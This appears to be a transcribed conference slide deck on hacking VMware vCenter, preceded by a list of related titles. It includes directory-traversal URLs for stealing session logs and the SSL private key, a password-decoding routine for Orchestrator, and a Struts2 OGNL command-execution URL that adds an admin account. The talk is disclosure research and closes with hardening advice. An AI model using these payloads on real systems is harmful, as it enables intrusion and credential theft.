How to hack VMware vcenter server in 60 seconds

Similar documents
How to hack VMware vcenter server in 60 seconds

Virtually Pwned Pentesting VMware. Claudio

Top 10 most interesting SAP vulnerabilities and attacks Alexander Polyakov

Penetration: from Application down to OS

Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO

Security Vulnerabilities in Open Source Java Libraries. Patrycja Wegrzynowicz CTO, Yonita, Inc.

Invest in security to secure investments Oracle PeopleSoft applications are under attacks!

PowerChute TM Network Shutdown Security Features & Deployment

Thick Client Application Security

Web Application Report

Top 10 most interes.ng SAP vulnerabili.es and a9acks

Oracle PeopleSoft Applications are Under Attack

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Using Foundstone CookieDigger to Analyze Web Session Management

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Information Technology Policy

CRYPTUS DIPLOMA IN IT SECURITY

Turning your managed Anti-Virus

What is Web Security? Motivation

Web Application Security

Vulnerability Assessment and Penetration Testing

If you know the enemy and know yourself, you need not fear the result of a hundred battles.

VMware vcenter Support Assistant 5.1.1

Using Websense Data Endpoint Client Software

Metasploit The Elixir of Network Security

Application Security Testing

SECURITY TRENDS & VULNERABILITIES REVIEW 2015

Professional Penetration Testing Techniques and Vulnerability Assessment ...

1. LAB SNIFFING LAB ID: 10

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

A crushing blow at the heart of SAP J2EE Engine. For BlackHat USA Version 1.0

Kentico CMS security facts

AJAX Storage: A Look at Flash Cookies and Internet Explorer Persistence

Penetration from application down to OS

Hack Your SQL Server Database Before the Hackers Do

NetBrain Security Guidance

iscsi Security (Insecure SCSI) Presenter: Himanshu Dwivedi

Chapter 1 Web Application (In)security 1

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

EAS-SEC Project: Securing Enterprise Business Applications

Using ilove SharePoint Web Services Workflow Action

Ruby on Rails Secure Coding Recommendations


Linux Network Security

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

CareGiver Remote Support Information Technology FAQ

How To Protect A Web Application From Attack From A Trusted Environment

Penetration Testing with Kali Linux

Integrating Web Application Security into the IT Curriculum

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Funambol Exchange Connector v6.5 Installation Guide

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

FORBIDDEN - Ethical Hacking Workshop Duration

Today s Topics. Protect - Detect - Respond A Security-First Strategy. HCCA Compliance Institute April 27, Concepts.

Architecture. The DMZ is a portion of a network that separates a purely internal network from an external network.

Oracle post exploitation techniques. László Tóth

Locking down a Hitachi ID Suite server

Security Testing. Vulnerability Assessment vs Penetration Testing. Gabriel Mihai Tanase, Director KPMG Romania. 29 October 2014

Lifecycle Manager Installation and Configuration Guide

Nipper Studio Beginner s Guide

The Open Cyber Challenge Platform *

Different ways to guess Oracle database SID

Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified

Mingyu Web Application Firewall (DAS- WAF) All transparent deployment for Web application gateway

Topics in Network Security

The Epic Turla Operation: Information on Command and Control Server infrastructure

Installing and Configuring Nessus by Nitesh Dhanjani

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

How to scan/exploit a ssl based webserver. by xxradar. mailto:xxradar@radarhack.com. Version 1.

Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of

Application Design and Development

Lecture 11 Web Application Security (part 1)

VMware: Advanced Security

vrealize Air Compliance OVA Installation and Deployment Guide

Intrusion detection for web applications

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

VMware Horizon Toolbox 2.0 Guide VMware End User Computing 2015 November

Connection Broker Managing User Connections to Workstations and Blades, OpenStack Clouds, VDI, and more. Security Review

CSSIA CompTIA Security+ Domain. Network Security. Network Security. Network Security. Network Security. Network Security

8 steps to protect your Cisco router

Firewalls and Intrusion Detection

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

QualysGuard WAS. Getting Started Guide Version 3.3. March 21, 2014

Enterprise Application Security Workshop Series

How to Configure an Initial Installation of the VMware ESXi Hypervisor

StreamServe Persuasion SP4 Service Broker

STABLE & SECURE BANK lab writeup. Page 1 of 21

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper

Adobe Systems Software Ireland Ltd

Architecture and Data Flow Overview. BlackBerry Enterprise Service Version: Quick Reference

Scan Report Executive Summary. Part 2. Component Compliance Summary IP Address :

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

Web Application Vulnerability Testing with Nessus

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

IBM Security QRadar SIEM Version MR1. Vulnerability Assessment Configuration Guide

Learn Ethical Hacking, Become a Pentester

Transcription:

Invest in security to secure investments How to hack VMware vcenter server in 60 seconds Alexey Sintsov, Alexander Minozhenko

#whoami Pen-tester at ERPscan Company Researcher DCG#7812 CTF

ERPScan Innovative company engaged in ERP security R&D Part of Digital Security, a Russian group of companies founded in 2002 Flagship product ERPScan Security Scanner for SAP Tools: pen-testing tool, sapsploit, web.xml scanner Consulting Services: ERP/SRM/CRM/SCADA/e.t.c Pen-tests,SAP assessment, SAP code review

Target

Target

VMware vcenter Server VMware vcenter Server is solution to manage VMware vsphere

CVE-2009-1523 Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../file Discovered by Claudio Criscione But Fixed in VMware Update Manager 4.1 update 1 :(

Directory traversal..again? Directory traversal in Jetty web server http://target:9084/vci/download/.%5c..%5c..%5c..%5c..%5c..% 5C..%5C..%5C..\FILE.EXT Discovered by Alexey Sintsov Metasploit module vmware_update_manager_traversal.rb by sinn3r

Directory traversal What file to read? Claudio Criscione propose to read vpxd-profiler-* - /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680- FB72656A1DCB'/Username= FakeDomain\FakeUser'/SoapSession/Id='A D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1 Contains logs of SOAP requests with session ID

VASTO VASTO collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions. http://vasto.nibblesec.org/ vmware_updatemanager_traversal.rb Jetty path traversal vmware_session_rider.rb Local proxy to ride stolen SOAPID sessions

Fixed in version 4.1 update 1, contain ip - addresses

Attack Make arp spoofing Spoof ssl certificate

Administrators check SSL cert Attack

Attack Steal ssl key via directory traversal http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key Make arp-spoofing Decrypt traffic with stolen ssl key What if arp-spoofing does not work?

Vmware vcenter Orchestrator Vmware vco software for automate configuration and management Install by default with vcenter Have interesting file /Program files\vmware\infrastructure\orchestrator\configuration\jetty\etc\passwd.properties

Which contains md5 password without salt Could easy bruteforce using rainbow tables, GPU

We get in

Plain text passwords

Vmware vcenter Orchestrator vco stored password at files: C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\plugins\VC.xml C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\vmo.properties

VC.xml <?xml version="1.0" encoding="utf-8" standalone="yes"?> <virtual-infrastructure-hosts> <virtual-infrastructure-host <enabled>true</enabled> <url>https://new-virtual-center-host:443/sdk</url> <administrator-username>vmware</administratorusername> <administratorpassword>010506275767b74786b383a4a60be76786474032 9d5fcf324ec7fc98b1e0aaeef </administrator-password> <pattern>%u</pattern> </virtual-infrastructure-host> </virtual-infrastructure-hosts>

Password Encoding 006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079 vcenter Red bytes look like length Green bytes in ASCII range Black bytes random

Algorithm password Encoding for (int i = 0; i < nbdigits; i++) { int value = 0; if (i < pwd.length()) { } value = pwd.charat(i); else { } value = Math.abs(rnd.nextInt() % 100); // Take i-th password symbol // Take random byte String toadd = Integer.toHexString(value + i); // i-th password symbol + position of symbol result.append(toadd);

Password Decoder len = (pass[0..2]).to_i enc_pass = pass[3..-1].scan(/.{2}/) dec_pass = (0...len).collect do i byte = enc_pass[i].to_i(16) byte -= i byte.chr end

VMSA-2011-0005 VMware vcenter Orchestrator use Struts2 version 2.11 discovered by Digital Defense, Inc CVE-2010-1870 Struts2/XWork remote command execution discovered by Meder Kydyraliev Fixed in 4.2

CVE-2010-1870 OGNL expression language for java Struts2 treat each HTTP parameter name as OGNL statement http://target/login.action?page[ login ]=user action.getpage().setlanguage( user )

CVE-2010-1870 OGNL support: Method calling: foo() Static method calling: @java.lang.system@exit(1) Constructor calling: new MyClass() Refer to variables: #foo = new MyClass() Context variables: #application, #session, #context

CVE-2010-1870 Struts2 does not properly escape # Could be bypass with unicode \u0023 2 variables need to be set for RCE #_memberaccess['allowstaticmethodaccess'] #context['xwork.methodaccessor.denymethode xecution']

CVE-2010-1870 Example exploit: #_memberaccess['allowstaticmethodaccess'] = true #foo = new java.lang.boolean("false") #context['xwork.methodaccessor.denymethode xecution'] = #foo #rt = @java.lang.runtime@getruntime() #rt.exec( calc.exe )

CVE-2010-1870 Example exploit: http://target:8282/login.action? ('\u0023_memberaccess[\'allowstaticmethodacce ss\']')(meh)=true&(aaa)(('\u0023context[\'xwork. MethodAccessor.denyMethodExecution\']\u003d\ u0023foo') (\u0023foo\u003dnew java.lang.boolean("false")))& (asdf)(('\u0023rt.exec( net user /add eviladmin passwd123 )') (\u0023rt\u003d@java.lang.runtime@getruntime ()))=1

Hardering Update to latest version 4.2 update 4 or 5 Filter administration service services VMware vsphere Security Hardering Guide

Conclusions Fixed bugs not always fixed in proper way One simple bug and we can own all infrastructure Password must be stored in hash with salt or encrypted

Thank you! a.minozhenko@dsec.ru @al3xmin